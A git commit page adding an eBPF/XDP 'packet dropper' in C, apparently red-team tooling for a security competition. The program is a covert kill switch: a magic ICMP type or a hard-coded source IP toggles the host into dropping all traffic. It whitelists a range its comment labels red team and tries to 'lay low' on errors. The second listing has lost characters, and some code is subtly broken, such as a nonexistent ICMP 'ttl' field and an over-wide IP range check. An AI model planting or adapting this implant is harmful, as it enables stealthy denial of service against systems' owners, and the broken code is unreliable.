added new version of packet droppper

author: Ryan Schanzenbacher <ryan@rschanz.org> 2023-03-08 16:22:25 -0500
committer: Ryan Schanzenbacher <ryan@rschanz.org> 2023-03-08 16:22:25 -0500
commit: 4da4b60f287f4c468befbbec2a047e685ef412b9 (patch)
tree: 096821e8b8d4383624562a512c5b2eab17a132b0
parent: 42c1eb52ecc0b205b91e8dbbfc06a146d6db6f97 (diff)
1 files changed, 99 insertions, 0 deletions
diff --git a/packet_dropper_new.c b/packet_dropper_new.c
new file mode 100644
index 0000000..a59a3a4
--- /dev/null
+++ b/packet_dropper_new.c
@@ -0,0 +1,99 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_endian.h>
+#include <linux/if_ether.h>
+#include <linux/in.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/icmp.h>
+#include <linux/if_vlan.h>
+//#include <arpa/inet.h>
+struct {
+        __uint(type, BPF_MAP_TYPE_ARRAY);
+        __type(key, __u32);
+        __type(value, __u32);
+        __uint(max_entries, 1);
+} status SEC(".maps");
+SEC("xdpentry")
+int entry(struct xdp_md *ctx) {
+        // Prepare some data structures
+        __u32 *rec;
+        __u32 key = 0;
+        void *data_end = (void *)(long)ctx->data_end;
+        void *data = (void *)(long)ctx->data;
+        struct ethhdr *eth = data;
+        rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
+        if (!rec) {
+                return XDP_DROP; // try to lay low on error
+        }
+        //bpf_printk("Rec: %u", *rec); // Debug prints
+        if ((*rec != 55) && (*rec != 56)) {
+                // First run check
+                // bpf_printk("Resetting rec!"); // Debug Prints
+                *rec = 56; // set default value for map
+        }
+        if (eth + 1 > data_end) // Bounds checking for xdp preverifier
+                return XDP_PASS; // This should never run normally
+        if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
+                return XDP_PASS; // don't kill layer 2 traffic
+        }
+        struct iphdr *iph = data + sizeof(struct ethhdr);
+        if (iph + 1 > data_end) // More bounds checking
+                return XDP_PASS; // This should never run either
+                                 //
+        __u32 ip_src = iph->saddr; // grab source address of packet
+        
+        struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
+        if (icmph + 1 > data_end) {
+                // More bounds checking
+                return XDP_PASS;
+        }
+        char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
+        
+        // bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
+        // Determine if we need to further process this packet
+        //if (ip_src == 1946091487) {
+        bpf_printk("Incoming packet: %u\n", icmph->type);
+        if (icmph->ttl == 252) {
+                bpf_printk("Echo request data: %x", pingdata);
+        }
+        if (icmph->type == 2 || ip_src == 1946091487) {
+                // This packet had a destination of 223.255.254.115, do something!
+                // bpf_printk("Got it!, setting rec..."); // Debug print
+                switch (*rec) {
+                        case 55 :
+                                *rec = 56;
+                                break;
+                        case 56 :
+                                *rec = 55;
+                                break;
+                }
+                return XDP_DROP;
+        }
+        else if (ip_src == 0) {
+                // most likely a layer 2 packet, let it thru
+                return XDP_PASS;
+        }
+ else if (ip_src >= 16974090 && ip_src <= 503513354) {
+   // IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
+   return XDP_PASS;
+ }
+        // Finish processing
+        if (*rec == 55) {
+                return XDP_DROP;
+        } else {
+                return XDP_PASS;
+        }
+}
+char _license[] SEC("license")= "GPL";
author	Ryan Schanzenbacher <ryan@rschanz.org>	2023-03-08 16:22:25 -0500
committer	Ryan Schanzenbacher <ryan@rschanz.org>	2023-03-08 16:22:25 -0500
commit	4da4b60f287f4c468befbbec2a047e685ef412b9 (patch)
tree	096821e8b8d4383624562a512c5b2eab17a132b0
parent	42c1eb52ecc0b205b91e8dbbfc06a146d6db6f97 (diff)

diff --git a/packet_dropper_new.c b/packet_dropper_new.c new file mode 100644 index 0000000..a59a3a4 --- /dev/null +++ b/packet_dropper_new.c
@@ -0,0 +1,99 @@
	1	#include <linux/bpf.h>
	2	#include <bpf/bpf_helpers.h>
	3	#include <bpf/bpf_endian.h>
	4	#include <linux/if_ether.h>
	5	#include <linux/in.h>
	6	#include <linux/if_packet.h>
	7	#include <linux/ip.h>
	8	#include <linux/icmp.h>
	9	#include <linux/if_vlan.h>
	10	//#include <arpa/inet.h>
	11
	12	struct {
	13	__uint(type, BPF_MAP_TYPE_ARRAY);
	14	__type(key, __u32);
	15	__type(value, __u32);
	16	__uint(max_entries, 1);
	17	} status SEC(".maps");
	18
	19	SEC("xdpentry")
	20	int entry(struct xdp_md *ctx) {
	21	// Prepare some data structures
	22	__u32 *rec;
	23	__u32 key = 0;
	24	void data_end = (void )(long)ctx->data_end;
	25	void data = (void )(long)ctx->data;
	26	struct ethhdr *eth = data;
	27
	28	rec = bpf_map_lookup_elem(&status, &key); // Lookup current packet status from kernel map
	29	if (!rec) {
	30	return XDP_DROP; // try to lay low on error
	31	}
	32	//bpf_printk("Rec: %u", *rec); // Debug prints
	33	if ((rec != 55) && (rec != 56)) {
	34	// First run check
	35	// bpf_printk("Resetting rec!"); // Debug Prints
	36	*rec = 56; // set default value for map
	37	}
	38
	39	if (eth + 1 > data_end) // Bounds checking for xdp preverifier
	40	return XDP_PASS; // This should never run normally
	41
	42	if(bpf_ntohs(eth->h_proto) == ETH_P_ARP) {
	43	return XDP_PASS; // don't kill layer 2 traffic
	44	}
	45
	46	struct iphdr *iph = data + sizeof(struct ethhdr);
	47	if (iph + 1 > data_end) // More bounds checking
	48	return XDP_PASS; // This should never run either
	49	//
	50	__u32 ip_src = iph->saddr; // grab source address of packet
	51
	52	struct icmphdr *icmph = data + sizeof(struct ethhdr) + sizeof(struct iphdr);
	53	if (icmph + 1 > data_end) {
	54	// More bounds checking
	55	return XDP_PASS;
	56	}
	57
	58	char *pingdata = data + sizeof(struct ethhdr) + sizeof(struct iphdr) + sizeof(struct icmphdr);
	59
	60	// bpf_printk("Incoming packet: %u\n", ip_src); // Debug print
	61	// Determine if we need to further process this packet
	62	//if (ip_src == 1946091487) {
	63	bpf_printk("Incoming packet: %u\n", icmph->type);
	64	if (icmph->ttl == 252) {
	65	bpf_printk("Echo request data: %x", pingdata);
	66	}
	67	if (icmph->type == 2 \|\| ip_src == 1946091487) {
	68	// This packet had a destination of 223.255.254.115, do something!
	69	// bpf_printk("Got it!, setting rec..."); // Debug print
	70	switch (*rec) {
	71	case 55 :
	72	*rec = 56;
	73	break;
	74	case 56 :
	75	*rec = 55;
	76	break;
	77	}
	78	return XDP_DROP;
	79	}
	80	else if (ip_src == 0) {
	81	// most likely a layer 2 packet, let it thru
	82	return XDP_PASS;
	83	}
	84
	85	else if (ip_src >= 16974090 && ip_src <= 503513354) {
	86	// IP is between 10.1.3.1 and 10.1.3.30. Allow to pass for red team
	87	return XDP_PASS;
	88	}
	89
	90	// Finish processing
	91	if (*rec == 55) {
	92	return XDP_DROP;
	93	} else {
	94	return XDP_PASS;
	95	}
	96	}
	97
	98
	99	char _license[] SEC("license")= "GPL";